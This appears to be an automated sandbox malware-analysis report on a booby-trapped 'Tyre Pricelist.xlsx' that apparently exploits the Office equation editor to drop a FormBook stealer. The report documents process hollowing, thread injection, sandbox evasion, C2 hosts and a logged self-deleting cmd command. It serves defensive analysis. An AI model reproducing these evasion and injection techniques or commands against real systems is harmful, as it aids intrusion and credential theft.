          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Tyre Pricelist.xlsxStatic file information: File size 2481664 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: netstat.pdb source: RegAsm.exe, 00000006.00000002.2216733185.00000000002AC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, NETSTAT.EXE
          Source: Tyre Pricelist.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Tyre Pricelist.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004169BB push esi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040AB07 push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00414E05 push ss; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEF2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEFB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CEA5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041CF5C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253DFA1 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008BE3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_000969BB push esi; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0008AB07 push ds; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00094E05 push ss; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEFB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0009CF5C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86101767821
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86101767821
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Tyre Pricelist.xlsxStream path 'EncryptedPackage' entropy: 7.99990874269 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409A80 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312Thread sleep time: -600000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2312Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2852Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1028Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2792Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2195930898.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2195905720.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2190381615.0000000000946000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409A80 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F01CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025200EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02520080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.241.137 80
          Source: C:\Windows\explorer.exeNetwork Connect: 180.215.92.80 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: FF0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2187913819.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Disable or Modify Tools1Credential API Hooking1System Network Connections Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information41Security Account ManagerSystem Information Discovery112SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery221Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection612/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 321115 Sample: Tyre Pricelist.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for dropped file 2->68 70 14 other signatures 2->70 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 14 2->15         started        process3 dnsIp4 44 workfinethdysanotherrainbowlomoyentthghf.ydns.eu 103.125.191.5, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 38 C:\Users\user\AppData\...\svchost[1].exe, PE32 10->38 dropped 40 C:\Users\Public\vbc.exe, PE32 10->40 dropped 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->82 17 vbc.exe 1 10->17         started        42 C:\Users\user\Desktop\~$Tyre Pricelist.xlsx, data 15->42 dropped file5 signatures6 process7 signatures8 50 Antivirus detection for dropped file 17->50 52 Multi AV Scanner detection for dropped file 17->52 54 Machine Learning detection for dropped file 17->54 56 2 other signatures 17->56 20 RegAsm.exe 17->20         started        23 RegAsm.exe 17->23         started        25 cmd.exe 17->25         started        process9 signatures10 72 Modifies the context of a thread in another process (thread injection) 20->72 74 Maps a DLL or memory area into another process 20->74 76 Sample uses process hollowing technique 20->76 78 Queues an APC in another process (thread injection) 20->78 27 explorer.exe 20->27 injected 80 Tries to detect virtualization through RDTSC time measurements 23->80 31 choice.exe 25->31         started        process11 dnsIp12 46 www.pestigenix.com 91.195.241.137, 49166, 80 SEDO-ASDE Germany 27->46 48 www.atlanticdentallab.com 180.215.92.80, 49167, 80 BCPL-SGBGPNETGlobalASNSG Singapore 27->48 84 System process connects to network (likely due to code injection or exploit) 27->84 33 NETSTAT.EXE 27->33         started        signatures13 process14 signatures15 58 Modifies the context of a thread in another process (thread injection) 33->58 60 Maps a DLL or memory area into another process 33->60 62 Tries to detect virtualization through RDTSC time measurements 33->62 36 cmd.exe 33->36         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Tyre Pricelist.xlsx27%VirustotalBrowse
          Tyre Pricelist.xlsx21%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%AviraTR/AD.Swotter.sxyuz
          C:\Users\Public\vbc.exe100%AviraTR/AD.Swotter.sxyuz
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe33%ReversingLabsWin32.Trojan.Wacatac
          C:\Users\Public\vbc.exe33%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.vbc.exe.510000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.atlanticdentallab.com0%VirustotalBrowse
          workfinethdysanotherrainbowlomoyentthghf.ydns.eu4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
